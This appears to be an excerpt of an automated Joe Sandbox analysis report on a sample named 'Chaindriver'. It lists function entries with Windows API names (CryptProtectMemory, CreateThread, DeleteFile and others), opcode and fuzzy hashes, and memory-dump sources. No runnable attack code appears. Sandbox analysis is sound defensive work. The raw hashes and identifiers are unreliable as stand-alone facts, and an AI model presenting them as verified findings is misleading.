                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                    • API String ID: 1389829785-2207617598
                                                    • Opcode ID: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction ID: 2c2953a26ca9787959745b7b9e2ce0c5a7e3babcc7d1cafb7a387fca60ce0688
                                                    • Opcode Fuzzy Hash: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction Fuzzy Hash: C2316D24A4AA0791FA34AB19AC6453CA7B0EF48B90FC40535CA4F03BA4DE3CF6418F34

                                                    Control-flow Graph

                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction ID: e728a1c02fbcee42f03b9779e1ba20a4516885326d6895fd82a467f90807b8a0
                                                    • Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction Fuzzy Hash: 26014F21A08A5791FA70AB21EC147AE9354EF99740FC40431C95F16765DE2CF6498E30
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                    • String ID:
                                                    • API String ID: 2912839123-0
                                                    • Opcode ID: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction ID: 94902fdbd857004d361672f0a593520b029bffd287078d2fca6676f30d186f65
                                                    • Opcode Fuzzy Hash: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction Fuzzy Hash: DC51A066F2465284FB20ABA5DC452AD6322EF44BA4F80063ADB1E17BD5DF6CF540CB30
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction ID: 6ac263aa281c580d21c6b830879b9241f7ccf1fbf4d80aa599390f379f5ba94c
                                                    • Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction Fuzzy Hash: BA313729E0990246FA74BB649C613BDA291EF40784FC4043CD90F4B7E3DE2DB9048E31
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction ID: c13aedec008af3ca270b01616465980ee98065f696b45409071c0dae32ac14d7
                                                    • Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction Fuzzy Hash: 66217F21E0860289EA30AF15AC2023DE3B0FB45B94FD44130DA5E4AB94CE3CFA859F74
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2610526550-3849766595
                                                    • Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction ID: 102d08a36f20fe251197a09b5556fd257ef1f87113322d6041956b5738a799fd
                                                    • Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction Fuzzy Hash: 18114C35A18A4281EA20AB14EC5116EB360FB84784FD44531D65E02B69DF3CF682CF70
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: DirectoryInitializeMallocSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 174490985-3360196438
                                                    • Opcode ID: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction ID: 10087593dccec33ea34199783160363d8faf1a17b6172273754db397abdf9098
                                                    • Opcode Fuzzy Hash: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction Fuzzy Hash: 9DF04F76A18A4582EB61AF20EC1516EF3A0FB88754F800135E58E42B64DF7CE258CF20
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2176759853-0
                                                    • Opcode ID: 3e846a75996b98d67bcbe2fcf7b7e177c7c4e3bf59ed455f02099cc6229e5177
                                                    • Instruction ID: 9329019c5d3782fde08b67fda0f2f059841303e38f9652807d93d31275b5cc3d
                                                    • Opcode Fuzzy Hash: 3e846a75996b98d67bcbe2fcf7b7e177c7c4e3bf59ed455f02099cc6229e5177
                                                    • Instruction Fuzzy Hash: 4E21A472A18B8181EA249B65AC4017EB364FB89BD0F545235EB9E03B95DF3CE190CB50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1203560049-0
                                                    • Opcode ID: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
                                                    • Instruction ID: c79f70a6067a7723049380774ce5d0a80f0f7c52d6a77ec1fcc82344310b285a
                                                    • Opcode Fuzzy Hash: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
                                                    • Instruction Fuzzy Hash: 2421BB22E18A4181EE30AB25FC5427DA361FF88B94F945234EA9E437D5DF3CE544CA60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3118131910-0
                                                    • Opcode ID: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
                                                    • Instruction ID: 0cc295b706cac6490c99a274c10527ad7a470ec38c8696800cc8e47780f4cd5c
                                                    • Opcode Fuzzy Hash: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
                                                    • Instruction Fuzzy Hash: 1F217C22A1878181EA20AB25FC5516EB361FB84B94F941234EA9E56B95DF3CF540CE70
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1203560049-0
                                                    • Opcode ID: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
                                                    • Instruction ID: 7c468b5f8a09cf1eb3b6a6bbb3bd5972e58d261fdd3976d5f8d537a71b205f91
                                                    • Opcode Fuzzy Hash: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
                                                    • Instruction Fuzzy Hash: EA217C22A1868181EA20AB29FC5416DA361FBC4B94F940235EA9E43BD5DF3CE5458E24
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Item_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1746051919-0
                                                    • Opcode ID: f6d8c5fbbcd0c2d54c192febb6712a66cb73e134d8dca87a5b887cf4e1c9eeef
                                                    • Instruction ID: fd1e124bc6a965ecb1c0c6df99da2385b70633c5236cbc197ca89896fcb0a53c
                                                    • Opcode Fuzzy Hash: f6d8c5fbbcd0c2d54c192febb6712a66cb73e134d8dca87a5b887cf4e1c9eeef
                                                    • Instruction Fuzzy Hash: 8E31A132E1878686EA24AB15EC4537EB361EB84790F944235EB9E07B95DF3CF5408B24
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                    • Instruction ID: 1f2d7c7034d2fa822df64f78b12b64302ad8581121d1b6253a8b0fcd1e28a667
                                                    • Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                    • Instruction Fuzzy Hash: 6221D122E4974251EE71AB51DC2037EA791EF01794FD94031CE4E06391EE3CF68ADA30
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID:
                                                    • API String ID: 2948472770-0
                                                    • Opcode ID: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                                    • Instruction ID: 727ea5eb2a70d3f11a6a733591764496f3a8f08a629ca80466992d1505fd83e7
                                                    • Opcode Fuzzy Hash: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                                    • Instruction Fuzzy Hash: A3117C61B1864986EA20AF16AD4442CF7A1FB89FC0B948435CE1E93721DF3CF6018F68
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                    • Instruction ID: 0615db6524c2e435f589058d68b9f4e077e972eced851df18c3171d478339c9d
                                                    • Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                    • Instruction Fuzzy Hash: 1D115E21E1864181FB70AB25EC8127DA760EB44BA4FD44331DA2E567D5CF3CE686DB20
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF720B4EB29,?,?,?,?,00007FF720B45712,?,?,?,00007FF720B4569E), ref: 00007FF720B4EAD8
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF720B4EAEB
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction ID: 16b62b9c9b010fba86b65812bad23e1a417dc9a2eb27e040384d6c697b96c992
                                                    • Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction Fuzzy Hash: ECE0E561B1458682DF199B59CC955AEE391FF88B40BC48036E50B83B14DE2CF2498F20
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 1173176844-0
                                                    • Opcode ID: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
                                                    • Instruction ID: 84b977227532e0e651c04db7f4d00e785b94f658fd0ca1c837f8c3e733df40ab
                                                    • Opcode Fuzzy Hash: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
                                                    • Instruction Fuzzy Hash: BCE0B648E1D90B01FA3833615C651BD8154CF5A770EA81B38DB3F187C6AD2CB4924930
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                     • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 0775a86a686ea590aaf7c9edd055dabde09601dbd76f09eba2acf58d909f3722
                                                    • Instruction ID: 7d0f38ca261041f90fdc6fc304ac8d0642be2ae8c971f2728dfd9def0bfc764e
                                                    • Opcode Fuzzy Hash: 0775a86a686ea590aaf7c9edd055dabde09601dbd76f09eba2acf58d909f3722
                                                    • Instruction Fuzzy Hash: ABD1A862B0868155EB78AB259D842BEE7A1FB55F84F940035DB5E47BA1CF38F4608B30
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                     • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: ccc6f9a6790b431fd1ab8e253d0064bfce7d4e51591ba4d521b92c82876fdba2
                                                    • Instruction ID: 167d23d9e310a823c8f43eef4dcaead3914b445b5e472ac2d43fb864a2735736
                                                    • Opcode Fuzzy Hash: ccc6f9a6790b431fd1ab8e253d0064bfce7d4e51591ba4d521b92c82876fdba2
                                                    • Instruction Fuzzy Hash: 12919662F1461188FB20EB64DC441AC6BB6EF00769F940635DA1E52BD9DF78E981C770
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                     • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 680105476-0
                                                    • Opcode ID: 8fc7eae5c4670fc1140e9880ae56cf99f2ea895d36ba7cddaaf7ea12a3bcbbde
                                                    • Instruction ID: 89eb7fc080ff7b565645095d909e6dac016cc3c7bbcbb785918a7160bf9cb993
                                                    • Opcode Fuzzy Hash: 8fc7eae5c4670fc1140e9880ae56cf99f2ea895d36ba7cddaaf7ea12a3bcbbde
                                                    • Instruction Fuzzy Hash: 4F218122A0865195EA24AB91AC4027DA258EB05BF0FA80F35DE7F47FD1DE7CF0518B64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                     • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction ID: 91e0c8ef90eed8bd30a688c710b4ad7347b3e874d78f00bd67c0fd8231ba5e28
                                                    • Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction Fuzzy Hash: 37113D2291C68286E630AB59AC4453DF2A4FB44380F950935E68F877AADF2CF9008F34
                                                    APIs
                                                    Memory Dump Source
